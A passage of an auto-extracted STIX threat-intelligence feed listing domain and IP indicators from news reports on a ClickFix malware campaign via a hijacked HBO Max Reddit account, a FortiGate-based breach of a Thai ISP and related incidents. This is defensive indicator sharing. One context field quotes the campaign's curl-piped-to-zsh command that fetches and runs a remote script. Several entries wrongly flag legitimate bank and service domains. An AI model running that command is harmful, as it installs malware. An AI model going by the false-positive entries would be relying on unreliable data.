(\"ocr.opusaccel[.]top\") to receive further instructions that are then executed","pattern":"[domain-name:value = 'opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-15T05:31:05.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-hackers-exploit-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e2b42e9c-b31d-4c5b-b653-3a4d03fb838d","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: promoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . Th","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4eda7e6-b247-4b09-8bf3-37e4b879a0cd","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: inting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usi","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ac5d788c-f5fe-4405-89cd-131e973f9723","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: ng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both en","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c1827f7-ed7d-43e6-b317-797af10a0cda","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: al lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd4c9c4c-f8c4-4708-9602-4efd255f5a78","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: cted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the site","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--77a7b6c1-68ed-4a90-b630-942b25ab2377","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 164.90.161.147","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September ma","pattern":"[ipv4-addr:value = '164.90.161.147']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efc70ab1-5905-44e2-864e-7ac6aff63333","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 165.22.199.85","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration Septemb","pattern":"[ipv4-addr:value = '165.22.199.85']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7eaa9261-7e62-4185-a773-97ac493fc892","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 45.94.47.204","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemen","pattern":"[ipv4-addr:value = '45.94.47.204']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a301f69c-4a0b-4a6d-83d4-fb480a4ac3d9","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"ipv4: 77.91.65.13","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP autho","pattern":"[ipv4-addr:value = '77.91.65.13']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b317c45b-ddb9-4474-b17a-9a1c758f5bdc","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: fied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. A","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--192105bd-460e-411e-9956-8176d60ab35b","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: focused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performe","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20ff8aed-a736-4088-ba83-d3c911e7aef2","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hunt.io","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: 10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a comp","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed3b81ca-3212-4a7e-bc51-8bbe9b73459a","created":"2026-09-15T05:20:47.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: triplet.co","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor\" (GBHackers). Context: ernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested t","pattern":"[domain-name:value = 'triplet.co']","pattern_type":"stix","valid_from":"2026-09-15T05:20:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-fortigate-ssl-vpn-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d443679-5a95-41c4-8f5d-98d90557ce76","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: abchina.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: .]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit","pattern":"[domain-name:value = 'abchina.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--70d43305-647c-46ef-a833-0ef1747b6a77","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ccb.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: k of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unio","pattern":"[domain-name:value = 'ccb.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fd5925e-bf1d-42e4-984a-22cb0fd610cf","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: com.cn","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Note: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultu","pattern":"[domain-name:value = 'com.cn']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8869c671-47ac-4717-98a4-ed74c5a35a8f","created":"2026-09-15T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: lzbank.com","description":"Seen in \"Tajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group\" (Recorded Future). Context: Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abc","pattern":"[domain-name:value = 'lzbank.com']","pattern_type":"stix","valid_from":"2026-09-15T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/tajin-group-gurantee-marketplace"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c1f6700-f466-4b9f-8864-b07e635737f2","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clean-disk-guide.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Of the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktop","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--858bad1e-d300-46ca-bff6-b9210f709707","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: code-desktop.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: sk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributio","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9fb30476-caa8-49ee-94fc-b29bbb4bdeea","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-craft.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: trick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS di","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3fd7f5c-1623-4560-beb9-605ba403f664","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomax-macos.com","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an Ope","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--93319a57-e0f7-4745-a586-376d86d40fa9","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.app","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: s, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospect","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49c4d18e-0075-43be-b6ab-c1dc66f2e0ad","created":"2026-09-14T22:43:01.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"HBO Max Reddit account compromised to serve ClickFix attacks\" (The Register · Security). Context: n be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking th","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T22:43:01.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/cyber-crime/2026/09/14/hbo-max-reddit-account-compromised-to-serve-clickfix-attacks/5296408"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd84ccca-8af5-417b-8644-9be26fc11aa4","created":"2026-09-14T19:03:51.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ttvnw.net","description":"Seen in \"Twitch extension with 30K installs exposes users’ OAuth tokens\" (BleepingComputer). Context: tension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= q","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T19:03:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/twitch-extension-with-30k-installs-exposes-users-oauth-tokens/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d10e09ec-14ef-41c7-adf2-2e2ff4eaea36","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbo","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c063b357-d626-4153-b3aa-67f959a222a1","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: code-desktop.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: , 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the a","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b8ffac2-4215-46d0-af66-aca83c9b4aa4","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: codex-craft.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing t","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5140632-56a2-4f0a-86e5-0301df0e2660","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ember-bridge.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: lowing command: export _watch_v2=97d9d8dc;curl -sL \"https://ember-bridge[.]com/curl/a44a37519au/setup.sh\"| zsh Hudson Rock noted ember-b","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--403cb465-4317-41ce-af10-38582be0a868","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomax-macos.com","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: .]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience t","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aaeb9c4c-735b-4009-a77b-61fa38c98d51","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.app","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: ddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fa3ec6e-0eb6-4c57-a97c-6645f25d1efa","created":"2026-09-14T18:34:16.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hbomaxx.us","description":"Seen in \"Hackers hijack HBO Max Reddit account to push malware in ClickFix ads\" (BleepingComputer). Context: Max subreddits,\" warned the user . \"The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-14T18:34:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-hijack-hbo-max-reddit-account-to-push-malware-in-clickfix-ads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e72ead1c-bdbb-45d6-97af-6d8af2446555","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: agent.3bb.co","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: eshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w","pattern":"[domain-name:value = 'agent.3bb.co']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49d8e291-b01c-4545-bbbf-be70b0aa69c9","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ayuthayatech.com","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: reporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6743c9a3-7769-459d-96fb-ef9251b1a617","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: co.th","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: s over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,","pattern":"[domain-name:value = 'co.th']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35cb8b9d-49d1-4b35-82e9-6bfdf3891a68","created":"2026-09-14T18:01:49.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: hunt.io","description":"Seen in \"3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials\" (The Hacker News). Context: tacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-14T18:01:49.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/3bb-attacker-used-meshcentral-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a3899944-6c37-472d-9bb9-b2217c51222d","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ayuthayatech.com","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider\" (Cyber Security News). Context: s to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enro","pattern":"[domain-name:value = 'ayuthayatech.com']","pattern_type":"stix","valid_from":"2026-09-14T17:08:51.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fortigate-ssl-vpn-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdd12e1d-9ed7-453d-a707-26c97a625613","created":"2026-09-14T17:08:51.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: co.th","description":"Seen in \"Hackers Exploit FortiGate SSL-VPN 